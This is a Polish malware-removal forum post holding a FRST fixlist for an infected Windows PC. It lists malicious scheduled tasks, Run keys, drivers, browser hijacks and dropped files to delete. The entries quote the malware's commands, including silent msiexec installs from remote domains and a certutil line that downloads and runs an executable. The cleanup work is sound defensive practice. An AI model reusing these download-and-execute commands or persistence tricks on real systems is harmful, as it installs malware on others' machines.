Wykonaj Fixlist.txt dla FRST:
CloseProcesses:
EmptyTemp:
Task: {1E197D51-5BAE-401F-993C-BD49952B9A5B} - System32\Tasks\Opera scheduled Autoupdate 1533523119 => C:\Users\cwk\AppData\Roaming\Microsoft\Windows\rcdtacsv\wiihwtee.exe [2018-12-28] (
Task: {5847E149-184E-45CE-969D-7176DD68FC83} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2019-01-25] () <==== UWAGA
Task: {657D5EBA-B476-44F5-9561-0D1A69775D0E} - System32\Tasks\{9111EF1C-634F-DAFD-948A-F89F01B046F8} => "msiexec" /package hxxps://refreshnerer711.info/h2nBIK6F46S5.502 -q
Task: {914C4F6B-ECBF-4EAE-ABC2-FF6CA707BA78} - System32\Tasks\YoutubeDownloader => C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [2018-11-02] (Python Software Foundation) <==== UWAGA
Task: {9555ECF0-9AC2-4F88-8D68-73DE0F701302} - System32\Tasks\Opera scheduled Autoupdate 2796787680 => C:\Users\cwk\AppData\Roaming\Microsoft\Windows\vuhbawbu\wiihwtee.exe [2018-12-28] ()
Task: {BFF58558-19C8-4893-B40D-E2D2A5886933} - System32\Tasks\YoutubeDownloader_upd => C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe [2018-11-02] (Python Software Foundation) <==== UWAGA
Task: {CACB0DC4-9071-4C5E-8395-DB806B42FC49} - System32\Tasks\{90961E03-2B4E-5201-B585-F7B0126D4440} => "msiexec.exe" /q /i hxxps://refreshnerer711rb.info/j8Hf56z63IbG.KFZ
Task: {D7892A5C-CABF-4C69-BF6C-C8D1806601A8} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://headbuild.info/app/app.exe C:\Users\cwk\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\cwk\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
2019-01-25 19:36 - 2019-01-25 19:36 - 000274944 _____ () C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe
2019-01-25 19:37 - 2019-01-25 19:37 - 004525568 _____ () C:\Windows\rss\csrss.exe
Hosts:
() C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe
(SY) C:\Program Files\42NAB5248Q\42NAB5248.exe
(LiteManagerTeam) C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe
(Python Software Foundation) C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\python.exe
(Python Software Foundation) C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\python.exe
() C:\Windows\rss\csrss.exe
HKLM\...\RunOnce: [OMEWPRODUCT_] => C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\Chm3dtyç6s.exe [223744 2019-01-25] () <==== UWAGA
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [jJd16jnH-Y.exe] => C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\jJd16jnH-Y.exe [274944 2019-01-25] ()
HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [YoutubeDownloader_upd] => C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation) <==== UWAGA
HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [YoutubeDownloader] => C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe [95904 2018-11-02] (Python Software Foundation) <==== UWAGA
HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [PHP15RVN97IR9I8] => C:\Program Files\42NAB5248Q\42NAB5248.exe [829440 2019-01-25] (SY)
HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [1900.tmp] => C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe [672040 2019-01-25] (LiteManagerTeam) <==== UWAGA
HKU\S-1-5-21-469818906-28220939-695786958-1000\...\Run: [WispySky] => C:\Windows\rss\csrss.exe [4525568 2019-01-25] () <==== UWAGA
Startup: C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\rcdtacsv.lnk [2019-01-26]
ShortcutTarget: rcdtacsv.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
Startup: C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vuhbawbu.lnk [2019-01-26]
ShortcutTarget: vuhbawbu.lnk -> C:\Windows\System32\cmd.exe (Microsoft Corporation)
GroupPolicy: Ograniczenia - Windows Defender <==== UWAGA
GroupPolicy\User: Ograniczenia ? <==== UWAGA
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%61%72%63%68.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUXs70UwlfkZ5811CQjtuQOKJoO-HXaAVuxXP59aMUC04aukzf1WP7KLHhjgt4rkhb5gXa3d3XkxgMyElkqz34YyItCw45qcv50WhZUU6Gm54W0eeyLALdED5dzLJROeBXveXYsqlBmViQaMmBW0pLkT7eGQKYzBjX01datzk&q={searchTerms}
HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61%72.%63%6F%6D/?p=mKO_AwFzXIpYRaHdGKA1VtC1mRJr0-ErUXs70UwlfkZ5811CQjtuQOKJoO-HXaAVuxXP59aMUC04aukzf1WP7KLHhjgt4rkhb5gXa3d3XkxgMy1W2f9UCkHGyvIGcJxh9ijx1J2DoT9jpPdk_m8jwWSK3BHiFIoAwCyZc_qcRFwP0rzPFG8YFfKOgms8bObgqzN1FkYC
HKU\S-1-5-21-469818906-28220939-695786958-1000\Software\Microsoft\Internet Explorer\Main,Start Page Redirect Cache = hxxp://www.msn.com/pl-pl/?ocid=iehp
SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
FF user.js: detected! => C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\user.js [2017-06-30]
FF NewTab: Mozilla\Firefox\Profiles\uy55ed3f.default -> file:///C:/ProgramData/Polygens/ff.NT
FF NewTabOverride: Mozilla\Firefox\Profiles\uy55ed3f.default -> Enabled: pavel.sherbakov(_at_)gmail.com
FF Extension: (Firefox Protection) - C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{ab10d63e-3096-4492-ab0e-5edcf4baf988} [2019-01-23] [Brak podpisu cyfrowego]
FF Extension: (Foxy Gestures) - C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{e839c3f9-298e-4cd0-99e0-464431cb7c34}.xpi [2019-01-23]
C:\Users\cwk\AppData\Roaming\Mozilla\Firefox\Profiles\uy55ed3f.default\Extensions\{e839c3f9-298e-4cd0-99e0-464431cb7c34}.xpi
CHR HomePage: Default -> inline.go.mail.ru
CHR StartupUrls: Default -> "hxxp://mail.ru/cnt/10445?gp=834408"
CHR DefaultSearchURL: Default -> hxxp://go.mail.ru/distib/ep/?q={searchTerms}&fr=ntg&product_id=%7B9BB0A375-B70D-4FB8-AACB-2BA5774E3A7A%7D&gp=811570
CHR DefaultSearchKeyword: Default -> go.mail.ru
CHR DefaultSuggestURL: Default -> hxxp://suggests.go.mail.ru/chrome?q={searchTerms}
C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjeadgnobnacllefgoianipbiihbndcl
CHR Extension: (chrome_filter) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\fjeadgnobnacllefgoianipbiihbndcl [2019-01-26]
C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\gndoicapfdaldiokbcdnllfhnapokcbk
CHR Extension: (Домашняя страница Mail.Ru) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\gndoicapfdaldiokbcdnllfhnapokcbk [2019-01-23]
C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikpcpgklmefncbfgbdifkaphbaapgafh
CHR Extension: (Пульс) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\ikpcpgklmefncbfgbdifkaphbaapgafh [2019-01-23]
C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdhpacfhljhcombkalcmkahkhodpkbim
CHR Extension: (Mail.Ru) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\mdhpacfhljhcombkalcmkahkhodpkbim [2019-01-23]
C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh
CHR Extension: (Bazz Search SafeFinder) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmeinlfojlcegblpogpjbhipmonclejh [2019-01-25]
C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0
CHR Extension: (System Table) - C:\Users\cwk\AppData\Local\Google\Chrome\User Data\Default\SystemTable\1.2_0 [2019-01-25]
CHR HKLM-x32\...\Chrome\Extension: [gndoicapfdaldiokbcdnllfhnapokcbk] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [ikpcpgklmefncbfgbdifkaphbaapgafh] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [mdhpacfhljhcombkalcmkahkhodpkbim] - hxxps://clients2.google.com/service/update2/crx
S2 Smart Monitoring; C:\Program Files (x86)\SmartData\svchost_ms.exe [2204672 2019-01-25] () [Brak podpisu cyfrowego]
R1 5759B9013484; C:\Windows\5759B9013484.sys [621928 2019-01-25] (VideoDriver)
R3 Winmon; C:\Windows\System32\drivers\Winmon.sys [0 ] () <==== UWAGA (zerobajtowy plik/folder)
R3 WinmonFS; C:\Windows\System32\drivers\WinmonFS.sys [0 ] (Windows (R) Win 7 DDK provider) <==== UWAGA (zerobajtowy plik/folder)
R1 WinmonProcessMonitor; C:\Windows\System32\drivers\WinmonProcessMonitor.sys [36096 2019-01-26] () [Brak podpisu cyfrowego]
2019-01-26 16:58 - 2019-01-26 16:58 - 000036096 _____ C:\Windows\system32\Drivers\WinmonProcessMonitor.sys
2019-01-26 16:58 - 2019-01-26 16:58 - 000003478 _____ C:\Windows\System32\Tasks\ScheduledUpdate
2019-01-25 20:19 - 2019-01-26 16:56 - 000000000 ____D C:\AdwCleaner
2019-01-25 19:40 - 2019-01-26 16:58 - 000003178 _____ C:\Windows\System32\Tasks\csrss
2019-01-25 19:40 - 2019-01-25 19:40 - 006161408 _____ C:\Users\cwk\AppData\Local\dump007.dat
2019-01-25 19:40 - 2019-01-25 19:40 - 000000009 _____ C:\Users\cwk\rstr2.ini
2019-01-25 19:40 - 2019-01-25 19:40 - 000000000 ____D C:\Users\cwk\AppData\LocalLow\MAL
2019-01-25 19:39 - 2019-01-25 19:39 - 000000266 __RSH C:\Users\cwk\ntuser.pol
2019-01-25 19:38 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\Lavasoft
2019-01-25 19:38 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\eJBlAwaaSdTwMIVB
2019-01-25 19:37 - 2019-01-26 16:50 - 000003444 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 2796787680
2019-01-25 19:37 - 2019-01-25 19:38 - 000000000 ____D C:\Program Files (x86)\eWuDAKEgxIEaotatbUCTo
2019-01-25 19:37 - 2019-01-25 19:37 - 007858688 _____ C:\Users\cwk\AppData\Local\agent.dat
2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ C:\Users\cwk\AppData\Roaming\cbargat.exe.E
2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ (NeoSoft Tools ) C:\Users\cwk\AppData\Roaming\cbargat.exe
2019-01-25 19:37 - 2019-01-25 19:37 - 002036055 _____ C:\Users\cwk\AppData\Local\Zonedox.tst
2019-01-25 19:37 - 2019-01-25 19:37 - 001895383 _____ C:\Users\cwk\AppData\Local\DingTamtone.bin
2019-01-25 19:37 - 2019-01-25 19:37 - 000278509 _____ C:\Users\cwk\AppData\Local\Zunzamity.tst
2019-01-25 19:37 - 2019-01-25 19:37 - 000126464 _____ C:\Users\cwk\AppData\Local\noah.dat
2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ C:\Users\cwk\AppData\Roaming\lakric.exe.E
2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ C:\Users\cwk\AppData\Roaming\lakric.exe
2019-01-25 19:37 - 2019-01-25 19:37 - 000070896 _____ C:\Users\cwk\AppData\Local\Config.xml
2019-01-25 19:37 - 2019-01-25 19:37 - 000005568 _____ C:\Users\cwk\AppData\Local\md.xml
2019-01-25 19:37 - 2019-01-25 19:37 - 000000000 ____D C:\ProgramData\Lavasoft
2019-01-25 19:37 - 2019-01-25 19:37 - 000000000 ____D C:\Program Files\42NAB5248Q
2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zunzamity.exe
2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zonedox.exe
2019-01-25 19:36 - 2019-01-26 16:50 - 000003444 _____ C:\Windows\System32\Tasks\Opera scheduled Autoupdate 1533523119
2019-01-25 19:36 - 2019-01-25 19:42 - 000722944 _____ C:\Users\cwk\AppData\Local\sham.db
2019-01-25 19:36 - 2019-01-25 19:41 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Kodobi
2019-01-25 19:36 - 2019-01-25 19:39 - 000002676 __RSH C:\ProgramData\ntuser.pol
2019-01-25 19:36 - 2019-01-25 19:39 - 000000000 ____D C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd
2019-01-25 19:36 - 2019-01-25 19:39 - 000000000 ____D C:\Users\cwk\AppData\Roaming\YoutubeDownloader
2019-01-25 19:36 - 2019-01-25 19:36 - 000621928 _____ (VideoDriver) C:\Windows\5759B9013484.sys
2019-01-25 19:36 - 2019-01-25 19:36 - 000140800 _____ C:\Users\cwk\AppData\Local\installer.dat
2019-01-25 19:36 - 2019-01-25 19:36 - 000012489 _____ C:\Users\cwk\Desktop\lame 3.97 exe download
2019-01-25 19:36 - 2019-01-25 19:36 - 000003806 _____ C:\Windows\System32\Tasks\YoutubeDownloader_upd
2019-01-25 19:36 - 2019-01-25 19:36 - 000003584 _____ C:\Windows\System32\Tasks\{9111EF1C-634F-DAFD-948A-F89F01B046F8}
2019-01-25 19:36 - 2019-01-25 19:36 - 000003382 _____ C:\Windows\System32\Tasks\{90961E03-2B4E-5201-B585-F7B0126D4440}
2019-01-25 19:36 - 2019-01-25 19:36 - 000003344 _____ C:\Windows\System32\Tasks\YoutubeDownloader
2019-01-25 19:36 - 2019-01-25 19:36 - 000001134 _____ C:\Users\cwk\Desktop\foldershare.lnk
2019-01-25 19:36 - 2019-01-25 19:36 - 000001086 _____ C:\Users\cwk\Desktop\Adult Dating.lnk
2019-01-25 19:36 - 2019-01-25 19:36 - 000001078 _____ C:\Users\cwk\Desktop\Win iPhone X.lnk
2019-01-25 19:36 - 2019-01-25 19:36 - 000000003 _____ C:\Users\cwk\AppData\Local\wbem.ini
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Python
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\pg
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Users\cwk\AppData\Roaming\loweregcleaner
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\ProgramData\{5CBE66EB-DA92-3452-EAC7-D1B8EA2088E9}
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\ProgramData\{0484EB58-5721-6C68-594A-EBE059ADB2B1}
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\IFSds
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\foldershare
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 _____ C:\Users\cwk\AppData\Roaming\sent.dat
2019-01-25 19:26 - 2019-01-25 19:27 - 000000000 ____D C:\Program Files (x86)\Audio Identifier
2019-01-25 19:26 - 2019-01-25 19:26 - 001427014 _____ (BitAttack) C:\Users\cwk\Downloads\AudioIdentifier_setup.exe
2019-01-25 19:26 - 2019-01-25 19:26 - 000000000 ____D C:\Users\cwk\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Audio Identifier
2019-01-25 19:26 - 2019-01-25 19:26 - 000000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Audio Identifier
2019-01-23 17:48 - 2019-01-23 17:48 - 000000000 ____D C:\Users\cwk\licman
2019-01-23 17:47 - 2019-01-23 17:47 - 000000000 ____D C:\Users\cwk\Downloads\Ontrack EasyRecovery Pro 11.1.0 with Keygen [usoft24.com]
2019-01-23 17:46 - 2019-01-23 17:47 - 020984538 _____ C:\Users\cwk\Downloads\Ontrack EasyRecovery Pro 11.1.0 with Keygen [usoft24.com].rar
2019-01-23 17:42 - 2019-01-23 17:42 - 002859896 _____ (Copyright © 2015 eSupport.com • All Rights Reserved ) C:\Users\cwk\Downloads\undeleteplus_setup.exe
2019-01-23 17:42 - 2019-01-23 17:42 - 000000000 ____D C:\Program Files (x86)\eSupport.com
2019-01-23 17:32 - 2019-01-23 17:32 - 000000000 _____ C:\ProgramData\1.txt
2019-01-23 17:31 - 2019-01-25 19:36 - 000000000 ____D C:\Program Files (x86)\SmartData
1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\uAmPo.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Program Files (x86)\Common Files\wfjYYuOw.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\cwk\AppData\Roaming\AyeUuiOSi.exe
2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ (NeoSoft Tools ) C:\Users\cwk\AppData\Roaming\cbargat.exe
2019-01-25 19:37 - 2019-01-25 19:37 - 006860752 _____ () C:\Users\cwk\AppData\Roaming\cbargat.exe.E
2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ () C:\Users\cwk\AppData\Roaming\lakric.exe
2019-01-25 19:37 - 2019-01-25 19:37 - 000115200 _____ () C:\Users\cwk\AppData\Roaming\lakric.exe.E
2019-01-25 19:36 - 2019-01-25 19:36 - 000000000 _____ () C:\Users\cwk\AppData\Roaming\sent.dat
2019-01-25 19:37 - 2019-01-25 19:37 - 007858688 _____ () C:\Users\cwk\AppData\Local\agent.dat
2019-01-25 19:37 - 2019-01-25 19:37 - 000070896 _____ () C:\Users\cwk\AppData\Local\Config.xml
2019-01-25 19:37 - 2019-01-25 19:37 - 001895383 _____ () C:\Users\cwk\AppData\Local\DingTamtone.bin
2019-01-25 19:40 - 2019-01-25 19:40 - 006161408 _____ () C:\Users\cwk\AppData\Local\dump007.dat
2019-01-25 19:36 - 2019-01-25 19:36 - 000140800 _____ () C:\Users\cwk\AppData\Local\installer.dat
2019-01-25 19:37 - 2019-01-25 19:37 - 000005568 _____ () C:\Users\cwk\AppData\Local\md.xml
2019-01-25 19:37 - 2019-01-25 19:37 - 000126464 _____ () C:\Users\cwk\AppData\Local\noah.dat
2019-01-25 19:36 - 2019-01-25 19:42 - 000722944 _____ () C:\Users\cwk\AppData\Local\sham.db
2019-01-25 19:37 - 2019-01-25 19:37 - 000032038 _____ () C:\Users\cwk\AppData\Local\uninstall_temp.ico
2019-01-25 19:36 - 2019-01-25 19:36 - 000000003 _____ () C:\Users\cwk\AppData\Local\wbem.ini
2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zonedox.exe
2019-01-25 19:37 - 2019-01-25 19:37 - 002036055 _____ () C:\Users\cwk\AppData\Local\Zonedox.tst
2019-01-25 19:37 - 2019-01-25 19:36 - 001632256 _____ (TODO: <Company name>) C:\Users\cwk\AppData\Local\Zunzamity.exe
2019-01-25 19:37 - 2019-01-25 19:37 - 000278509 _____ () C:\Users\cwk\AppData\Local\Zunzamity.tst
C:\Program Files\Mozilla Firefox\HYYGFVCIKZVYBS6\Chm3dtyç6s.exe
C:\Users\cwk\AppData\Roaming\YoutubeDownloader_upd\python\pythonw.exe
C:\Users\cwk\AppData\Roaming\YoutubeDownloader\python\pythonw.exe
C:\Users\cwk\AppData\Local\Temp\1900.tmp.exe
C:\Windows\rss\csrss.exe
Wykonaj Fixlist.txt ponownie z poziomu WinRe:
https://www.fixitpc.pl/topic/4414-diagnostyka-infekcji-na-niestartuj%C4%85cych-windows/
Po wykonaniu zamiesc nowe logi z FRST (wykonane juz z poziomu system), tylko zaznacz dodatkowo obcje Lista BCD.